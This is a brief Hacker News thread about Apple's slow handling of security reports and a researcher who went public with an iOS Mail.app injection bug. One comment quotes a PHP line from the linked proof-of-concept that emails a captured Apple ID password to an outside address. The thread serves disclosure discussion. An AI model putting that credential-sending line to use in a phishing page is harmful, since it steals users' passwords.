My experience with product-security@apple.com was that they sat on my report without doing anything for several months, then finally put together a fix after I threatened to go public.
It sounds like this guy may have skipped the threatening step and just went public.
kentonv|10 years ago
It sounds like this guy may have skipped the threatening step and just went public.
kranner|10 years ago
TsukasaUjiie|10 years ago
"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"
[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...